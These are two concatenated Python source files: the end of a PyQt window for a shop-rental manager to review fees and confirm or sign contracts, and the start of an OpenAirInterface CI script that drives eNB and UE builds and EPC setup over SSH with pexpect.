self.pushButtonShop_04.clicked.connect(lambda :self.set_information(4))
self.pushButtonShop_05.clicked.connect(lambda :self.set_information(5))
self.pushButtonShop_06.clicked.connect(lambda :self.set_information(6))
self.pushButtonShop_07.clicked.connect(lambda :self.set_information(7))
self.pushButtonShop_08.clicked.connect(lambda :self.set_information(8))
self.pushButtonShop_09.clicked.connect(lambda :self.set_information(9))
self.pushButtonShop_10.clicked.connect(lambda :self.set_information(10))
self.pushButtonShop_11.clicked.connect(lambda :self.set_information(11))
self.pushButtonShop_12.clicked.connect(lambda :self.set_information(12))
self.show_combo()
self.auditConfirmation.clicked.connect(self.confirm_contract)
self.signatureConfirmation.clicked.connect(self.sign_contract_)
self.residualAudit.currentTextChanged.connect(self.set_confirm_contract)
self.quantityAudited.currentTextChanged.connect(self.set_affrim_contract)
def set_confirm_contract(self):
for contract in self.__contracts:
if self.residualAudit.currentText() == str(contract["number"]):
self.contractContent.setText(contract["contractInfo"])
self.shopNun.setText(str(contract["number"]))
# self.userTel.setText(random.randint(12031823712,19023912381))
self.rentTime.setText(str(contract["contractYear"]))
return None
def set_affrim_contract(self):
for contract in self.__contracts:
if self.quantityAudited.currentText() == str(contract["number"]):
self.contractContent.setText(contract["contractInfo"])
self.shopNun.setText(str(contract["number"]))
# self.userTel.setText(str(random.randint(12031823712,19023912381)))
self.rentTime.setText(str(contract["contractYear"]))
return None
def show_combo(self):
"""
显示下拉合同菜单
:return:
"""
confirmNum = 0
signNum = 0
for contract in self.__contracts:
if contract["contractCeoAffirm"] ==0 and contract["contractCeoSign"] ==0:
self.residualAudit.addItem(str(contract["number"]))
confirmNum += 1
if contract["contractCeoAffirm"] ==1 and contract["contractCeoSign"] ==0:
# self.quantityAudited.addItem("asas")
self.quantityAudited.addItem(str(contract["number"]))
signNum += 1
self.residualAuditNum.setText(str(confirmNum))
self.quantityAuditedNum.setText(str(signNum))
return None
def set_information_confirm(self):
"""
选择申请选项后对右侧进行相应更新
:return:
"""
currentContract = None
for contract in self.__contracts:
if str(contract["number"]) == self.residualAudit.currentText():
currentContract = contract
break
self.shopNun.setText(str(currentContract["number"]))
# self.userTel.setText(str(currentContract["telenumber"]))
self.rentTime.setText(str(currentContract["contractYear"]))
self.contractContent.setText(str(currentContract["contractInfo"]))
# self.rentReason.setText(str(currentContract["rentUsage"]))
return None
def set_information(self,number):
currentReceipt = None
currentContract = None
currentReceivable = None
for receipt in self.__receipts:
if receipt["number"] == int(number):
currentReceipt = receipt
break
for contract in self.__contracts:
if contract["number"] == int(number):
currentContract = contract
break
for receivable in self.__receivables:
if receivable["number"] == int(number):
currentReceivable = receivable
break
self.owePropertyFee.setCheckable(True)
self.oweElectricFee.setCheckable(True)
self.oweGuaranteePaid.setCheckable(True)
self.oweWaterFee.setCheckable(True)
self.ceoConfirm.setCheckable(True)
self.userSignature.setCheckable(True)
self.ceoSingature.setCheckable(True)
if currentReceipt is not None and currentContract is not None and currentReceivable is not None:
# 店铺信息
self.propertyFee.setText(str(currentReceipt["receiptPropCharge"]))
self.guaranteePaid.setText(str(currentReceipt["receiptGuarCharge"]))
self.waterFeePaid.setText(str(currentReceipt["receiptWaterCharge"]))
self.electricFeePaid.setText(str(currentReceipt["receiptEleCharge"]))
# 缴纳状态
if currentReceivable["receivablePropCharge"] >currentReceipt["receiptPropCharge"]:
self.owePropertyFee.setChecked(1)
else:
self.owePropertyFee.setChecked(False)
if currentReceivable["receivableEleCharge"] >currentReceipt["receiptEleCharge"]:
self.oweElectricFee.setChecked(1)
else:
self.oweElectricFee.setChecked(False)
if currentReceivable["receivableGuarCharge"] >currentReceipt["receiptGuarCharge"]:
self.oweGuaranteePaid.setChecked(1)
else:
self.oweGuaranteePaid.setChecked(False)
if currentReceivable["receivableWaterCharge"] >currentReceipt["receiptWaterCharge"]:
self.oweWaterFee.setChecked(1)
else:
self.oweWaterFee.setChecked(False)
# 合同信息
self.shopNumberContract.setText(str(number))
self.RentStateContract.setText(str(currentContract["contractStatus"]))
self.rentTimeContract.setText(str(currentContract["contractYear"]))
print("**************currentContract[contractCeoAffirm]***************")
print(currentContract["contractCeoAffirm"])
print(bool(currentContract["contractCeoAffirm"]))
self.ceoConfirm.setChecked(bool(currentContract["contractCeoAffirm"]))
print("**************currentContract[contractProprietorSign]***************")
print(currentContract["contractProprietorSign"])
self.userSignature.setChecked(bool(currentContract["contractProprietorSign"]))
self.ceoSingature.setChecked(bool(currentContract["contractCeoSign"]))
self.contractInfomation.setText(str(currentContract["contractInfo"]))
else:
# 店铺信息
self.shopNumberText.setText(str(number))
self.propertyFeePaid.setText("")
self.guaranteePaid.setText("")
self.waterFeePaid.setText("")
self.electricFeePaid.setText("")
self.rentStateText.setText("")
# 缴纳状态
self.owePropertyFee.setChecked(False)
self.oweElectricFee.setChecked(False)
self.oweGuaranteePaid.setChecked(False)
self.oweWaterFee.setChecked(False)
# 合同信息
self.shopNumberContract.setText(str(number))
self.RentStateContract.setText("")
self.rentTimeContract.setText("")
self.ceoConfirm.setChecked(False)
self.userSignature.setChecked(False)
self.ceoSingature.setChecked(False)
self.contractInfomation.setText("")
# self.owePropertyFee.setCheckable(False)
# self.oweElectricFee.setCheckable(False)
# self.oweGuaranteePaid.setCheckable(False)
# self.oweWaterFee.setCheckable(False)
# self.ceoConfirm.setCheckable(False)
# self.userSignature.setCheckable(False)
# self.ceoSingature.setCheckable(False)
def confirm_contract(self):
"""
确认合同
:return:
"""
if self.contractConfirm.isChecked():
for contract in self.__contracts:
if str(contract["number"]) == str(self.shopNun.text()):
self.__control.set_contract_ceoaffirm_by_id(contract["ID"],1)
break
QMessageBox.information(self,
"消息",
"确认成功")
return None
def sign_contract_(self):
"""
签字
:return:
"""
if self.ceoSignature.text() !="":
for contract in self.__contracts:
if str(contract["number"]) == str(self.shopNun.text()):
self.__control.set_contract_ceosign_by_id(contract["ID"],1)
QMessageBox.information(self,
"消息",
"签字成功")
return None
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
MainWindow = CEOWindow("sa")
MainWindow.show()
sys.exit(app.exec_())
|
main.py
|
# /*
# * Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
# * contributor license agreements. See the NOTICE file distributed with
# * this work for additional information regarding copyright ownership.
# * The OpenAirInterface Software Alliance licenses this file to You under
# * the OAI Public License, Version 1.1 (the "License"); you may not use this file
# * except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.openairinterface.org/?page_id=698
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# *-------------------------------------------------------------------------------
# * For more information about the OpenAirInterface (OAI) Software Alliance:
# * contact@openairinterface.org
# */
#---------------------------------------------------------------------
# Python for CI of OAI-eNB + COTS-UE
#
# Required Python Version
# Python 3.x
#
# Required Python Package
# pexpect
#---------------------------------------------------------------------
#-----------------------------------------------------------
# Version
#-----------------------------------------------------------
Version = '0.1'
#-----------------------------------------------------------
# Constants
#-----------------------------------------------------------
ALL_PROCESSES_OK = 0
ENB_PROCESS_FAILED = -1
ENB_PROCESS_OK = +1
ENB_PROCESS_SEG_FAULT = -11
ENB_PROCESS_ASSERTION = -12
ENB_PROCESS_REALTIME_ISSUE = -13
ENB_PROCESS_NOLOGFILE_TO_ANALYZE = -14
ENB_PROCESS_SLAVE_RRU_NOT_SYNCED = -15
HSS_PROCESS_FAILED = -2
HSS_PROCESS_OK = +2
MME_PROCESS_FAILED = -3
MME_PROCESS_OK = +3
SPGW_PROCESS_FAILED = -4
SPGW_PROCESS_OK = +4
UE_IP_ADDRESS_ISSUE = -5
OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE = -20
OAI_UE_PROCESS_COULD_NOT_SYNC = -21
OAI_UE_PROCESS_ASSERTION = -22
OAI_UE_PROCESS_FAILED = -23
OAI_UE_PROCESS_NO_TUNNEL_INTERFACE = -24
OAI_UE_PROCESS_OK = +6
UE_STATUS_DETACHED = 0
UE_STATUS_DETACHING = 1
UE_STATUS_ATTACHING = 2
UE_STATUS_ATTACHED = 3
X2_HO_REQ_STATE__IDLE = 0
X2_HO_REQ_STATE__TARGET_RECEIVES_REQ = 1
X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE = 2
X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ = 3
X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK = 10
#-----------------------------------------------------------
# Import
#-----------------------------------------------------------
import sys # arg
import re # reg
import pexpect # pexpect
import time # sleep
import os
import subprocess
import xml.etree.ElementTree as ET
import logging
import datetime
import signal
from multiprocessing import Process, Lock, SimpleQueue
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(name)s:%(levelname)s: %(message)s"
)
#-----------------------------------------------------------
# Class Declaration
#-----------------------------------------------------------
class SSHConnection():
def __init__(self):
self.prematureExit = False
self.ranRepository = ''
self.ranBranch = ''
self.ranAllowMerge = False
self.ranCommitID = ''
self.ranTargetBranch = ''
self.eNBIPAddress = ''
self.eNBUserName = ''
self.eNBPassword = ''
self.eNBSourceCodePath = ''
self.EPCIPAddress = ''
self.EPCUserName = ''
self.EPCPassword = ''
self.eNB1IPAddress = ''
self.eNB1UserName = ''
self.eNB1Password = ''
self.eNB1SourceCodePath = ''
self.eNB2IPAddress = ''
self.eNB2UserName = ''
self.eNB2Password = ''
self.eNB2SourceCodePath = ''
self.EPCSourceCodePath = ''
self.EPCType = ''
self.EPC_PcapFileName = ''
self.ADBIPAddress = ''
self.ADBUserName = ''
self.ADBPassword = ''
self.ADBCentralized = True
self.testCase_id = ''
self.testXMLfiles = []
self.nbTestXMLfiles = 0
self.desc = ''
self.Build_eNB_args = ''
self.backgroundBuild = False
self.backgroundBuildTestId = ['', '', '']
self.Initialize_eNB_args = ''
self.eNB_instance = ''
self.eNB_serverId = ''
self.eNBLogFiles = ['', '', '']
self.eNBOptions = ['', '', '']
self.eNBmbmsEnables = [False, False, False]
self.ping_args = ''
self.ping_packetloss_threshold = ''
self.iperf_args = ''
self.iperf_packetloss_threshold = ''
self.iperf_profile = ''
self.iperf_options = ''
self.nbMaxUEtoAttach = -1
self.UEDevices = []
self.UEDevicesStatus = []
self.UEDevicesRemoteServer = []
self.UEDevicesRemoteUser = []
self.UEDevicesOffCmd = []
self.UEDevicesOnCmd = []
self.UEDevicesRebootCmd = []
self.CatMDevices = []
self.UEIPAddresses = []
self.htmlFile = ''
self.htmlHeaderCreated = False
self.htmlFooterCreated = False
self.htmlUEConnected = -1
self.htmleNBFailureMsg = ''
self.htmlUEFailureMsg = ''
self.picocom_closure = False
self.idle_sleep_time = 0
self.x2_ho_options = 'network'
self.x2NbENBs = 0
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.htmlTabRefs = []
self.htmlTabNames = []
self.htmlTabIcons = []
self.repeatCounts = []
self.finalStatus = False
self.OsVersion = ''
self.KernelVersion = ''
self.UhdVersion = ''
self.UsrpBoard = ''
self.CpuNb = ''
self.CpuModel = ''
self.CpuMHz = ''
self.UEIPAddress = ''
self.UEUserName = ''
self.UEPassword = ''
self.UE_instance = ''
self.UESourceCodePath = ''
self.UELogFile = ''
self.Build_OAI_UE_args = ''
self.Initialize_OAI_UE_args = ''
self.flexranCtrlInstalled = False
self.flexranCtrlStarted = False
self.expectedNbOfConnectedUEs = 0
self.startTime = 0
def open(self, ipaddress, username, password):
count = 0
connect_status = False
while count < 4:
self.ssh = pexpect.spawn('ssh', [username + '@' + ipaddress], timeout = 5)
self.sshresponse = self.ssh.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', 'Last login', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
self.ssh.sendline('yes')
self.ssh.expect('password:')
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 1:
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 2:
# Checking if we are really on the remote client defined by its IP address
self.command('stdbuf -o0 ifconfig | egrep --color=never "inet addr:|inet "', '\$', 5)
result = re.search(str(ipaddress), str(self.ssh.before))
if result is None:
self.close()
else:
count = 10
connect_status = True
else:
# debug output
logging.debug(str(self.ssh.before))
logging.debug('self.sshresponse = ' + str(self.sshresponse))
# adding a tempo when failure
if not connect_status:
time.sleep(1)
count += 1
if connect_status:
pass
else:
sys.exit('SSH Connection Failed')
def command(self, commandline, expectedline, timeout):
logging.debug(commandline)
self.ssh.timeout = timeout
self.ssh.sendline(commandline)
self.sshresponse = self.ssh.expect([expectedline, pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
return 0
elif self.sshresponse == 1:
logging.debug('\u001B[1;37;41m Unexpected EOF \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
logging.debug(str(self.ssh.before))
sys.exit(self.sshresponse)
elif self.sshresponse == 2:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
result = re.search('ping |iperf |picocom', str(commandline))
if result is None:
logging.debug(str(self.ssh.before))
sys.exit(self.sshresponse)
else:
return -1
else:
logging.debug('\u001B[1;37;41m Unexpected Others \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
def close(self):
self.ssh.timeout = 5
self.ssh.sendline('exit')
self.sshresponse = self.ssh.expect([pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
pass
elif self.sshresponse == 1:
if not self.picocom_closure:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT during closing\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Unexpected Others during closing\u001B[0m')
def copyin(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination)
while count < 10:
scp_spawn = pexpect.spawn('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# adding a tempo when failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
return 0
else:
return -1
def copyout(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination)
while count < 4:
scp_spawn = pexpect.spawn('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# adding a tempo when failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
pass
else:
sys.exit('SCP failed')
def BuildeNB(self):
if self.ranRepository == '' or self.ranBranch == '' or self.ranCommitID == '':
Usage()
sys.exit('Insufficient Parameter')
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
self.command('mkdir -p ' + lSourcePath, '\$', 5)
self.command('cd ' + lSourcePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.ranRepository + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
# Raphael: here add a check if git clone or git fetch went smoothly
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
# Checking the BUILD INFO file
if not self.backgroundBuild:
self.command('ls *.txt', '\$', 5)
result = re.search('LAST_BUILD_INFO', str(self.ssh.before))
if result is not None:
mismatch = False
self.command('grep SRC_COMMIT LAST_BUILD_INFO.txt', '\$', 2)
result = re.search(self.ranCommitID, str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep MERGED_W_TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
result = re.search('YES', str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
result = re.search('develop', str(self.ssh.before))
else:
result = re.search(self.ranTargetBranch, str(self.ssh.before))
if result is None:
mismatch = True
else:
result = re.search('NO', str(self.ssh.before))
if result is None:
mismatch = True
if not mismatch:
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
return
self.command('echo ' + lPassWord + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.ranCommitID != '':
self.command('git checkout -f ' + self.ranCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already been checked earlier
if (self.ranAllowMerge):
if self.ranTargetBranch == '':
if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
self.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
# no need to remove in log (git clean did the trick)
if self.backgroundBuild:
self.command('echo "./build_oai ' + self.Build_eNB_args + '" > ./my-lte-softmodem-build.sh', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-build.sh', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S -E daemon --inherit --unsafe --name=build_enb_daemon --chdir=' + lSourcePath + '/cmake_targets -o ' + lSourcePath + '/cmake_targets/compile_oai_enb.log ./my-lte-softmodem-build.sh', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
self.backgroundBuildTestId[int(self.eNB_instance)] = self.testCase_id
return
self.command('stdbuf -o0 ./build_oai ' + self.Build_eNB_args + ' 2>&1 | stdbuf -o0 tee compile_oai_enb.log', 'Bypassing the Tests|build have failed', 1500)
self.checkBuildeNB(lIpAddr, lUserName, lPassWord, lSourcePath, self.testCase_id)
def WaitBuildeNBisFinished(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
count = 40
buildOAIprocess = True
while (count > 0) and buildOAIprocess:
self.command('ps aux | grep --color=never build_ | grep -v grep', '\$', 3)
result = re.search('build_oai', str(self.ssh.before))
if result is None:
buildOAIprocess = False
else:
count -= 1
time.sleep(30)
self.checkBuildeNB(lIpAddr, lUserName, lPassWord, lSourcePath, self.backgroundBuildTestId[int(self.eNB_instance)])
def checkBuildeNB(self, lIpAddr, lUserName, lPassWord, lSourcePath, testcaseId):
self.command('cd ' + lSourcePath + '/cmake_targets', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
buildStatus = True
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
buildStatus = False
else:
# Generating a BUILD INFO file
self.command('echo "SRC_BRANCH: ' + self.ranBranch + '" > ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('echo "SRC_COMMIT: ' + self.ranCommitID + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
self.command('echo "MERGED_W_TGT_BRANCH: YES" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
self.command('echo "TGT_BRANCH: develop" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "TGT_BRANCH: ' + self.ranTargetBranch + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "MERGED_W_TGT_BRANCH: NO" >> ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('mkdir -p build_log_' + testcaseId, '\$', 5)
self.command('mv log/* ' + 'build_log_' + testcaseId, '\$', 5)
self.command('mv compile_oai_enb.log ' + 'build_log_' + testcaseId, '\$', 5)
if self.eNB_serverId != '0':
self.command('cd cmake_targets', '\$', 5)
self.command('if [ -e tmp_build' + testcaseId + '.zip ]; then rm -f tmp_build' + testcaseId + '.zip; fi', '\$', 5)
self.command('zip -r -qq tmp_build' + testcaseId + '.zip build_log_' + testcaseId, '\$', 5)
self.close()
if (os.path.isfile('./tmp_build' + testcaseId + '.zip')):
os.remove('./tmp_build' + testcaseId + '.zip')
self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/tmp_build' + testcaseId + '.zip', '.')
if (os.path.isfile('./tmp_build' + testcaseId + '.zip')):
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, './tmp_build' + testcaseId + '.zip', self.eNBSourceCodePath + '/cmake_targets/.')
os.remove('./tmp_build' + testcaseId + '.zip')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets', '\$', 5)
self.command('unzip -qq -DD tmp_build' + testcaseId + '.zip', '\$', 5)
self.command('rm -f tmp_build' + testcaseId + '.zip', '\$', 5)
self.close()
else:
self.close()
if buildStatus:
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
else:
logging.error('\u001B[1m Building OAI eNB Failed\u001B[0m')
self.CreateHtmlTestRow(self.Build_eNB_args, 'KO', ALL_PROCESSES_OK)
self.CreateHtmlTabFooter(False)
sys.exit(1)
def BuildOAIUE(self):
if self.UEIPAddress == '' or self.ranRepository == '' or self.ranBranch == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('mkdir -p ' + self.UESourceCodePath, '\$', 5)
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.ranRepository + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
# here add a check if git clone or git fetch went smoothly
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
self.command('ls *.txt', '\$', 5)
result = re.search('LAST_BUILD_INFO', str(self.ssh.before))
if result is not None:
mismatch = False
self.command('grep SRC_COMMIT LAST_BUILD_INFO.txt', '\$', 2)
result = re.search(self.ranCommitID, str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep MERGED_W_TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
result = re.search('YES', str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
result = re.search('develop', str(self.ssh.before))
else:
result = re.search(self.ranTargetBranch, str(self.ssh.before))
if result is None:
mismatch = True
else:
result = re.search('NO', str(self.ssh.before))
if result is None:
mismatch = True
if not mismatch:
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
return
self.command('echo ' + self.UEPassword + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.ranCommitID != '':
self.command('git checkout -f ' + self.ranCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already been checked earlier
if (self.ranAllowMerge):
if self.ranTargetBranch == '':
if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
self.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
# no need to remove in log (git clean did the trick)
self.command('stdbuf -o0 ./build_oai ' + self.Build_OAI_UE_args + ' 2>&1 | stdbuf -o0 tee compile_oai_ue.log', 'Bypassing the Tests|build have failed', 600)
self.command('ls lte_build_oai/build', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
buildStatus = True
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is None:
buildStatus = False
self.command('mkdir -p build_log_' + self.testCase_id, '\$', 5)
self.command('mv log/* ' + 'build_log_' + self.testCase_id, '\$', 5)
self.command('mv compile_oai_ue.log ' + 'build_log_' + self.testCase_id, '\$', 5)
if buildStatus:
# Generating a BUILD INFO file
self.command('echo "SRC_BRANCH: ' + self.ranBranch + '" > ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('echo "SRC_COMMIT: ' + self.ranCommitID + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
self.command('echo "MERGED_W_TGT_BRANCH: YES" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
self.command('echo "TGT_BRANCH: develop" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "TGT_BRANCH: ' + self.ranTargetBranch + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "MERGED_W_TGT_BRANCH: NO" >> ../LAST_BUILD_INFO.txt', '\$', 2)
self.close()
self.CreateHtmlTestRow(self.Build_OAI_UE_args, 'OK', ALL_PROCESSES_OK, 'OAI UE')
else:
self.close()
logging.error('\u001B[1m Building OAI UE Failed\u001B[0m')
self.CreateHtmlTestRow(self.Build_OAI_UE_args, 'KO', ALL_PROCESSES_OK, 'OAI UE')
self.CreateHtmlTabFooter(False)
sys.exit(1)
def InitializeHSS(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC Release 14 Cassandra-based HSS')
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
logging.debug('\u001B[1m Launching tshark on all interfaces \u001B[0m')
EPC_PcapFileName = 'epc_' + self.testCase_id + '.pcap'
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f ' + EPC_PcapFileName, '\$', 5)
self.command('echo $USER; nohup sudo tshark -f "tcp port not 22 and port not 53" -i any -w ' + self.EPCSourceCodePath + '/scripts/' + EPC_PcapFileName + ' > /tmp/tshark.log 2>&1 &', self.EPCUserName, 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S mkdir -p logs', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f hss_' + self.testCase_id + '.log logs/hss*.*', '\$', 5)
self.command('echo "oai_hss -j /usr/local/etc/oai/hss_rel14.json" > ./my-hss.sh', '\$', 5)
self.command('chmod 755 ./my-hss.sh', '\$', 5)
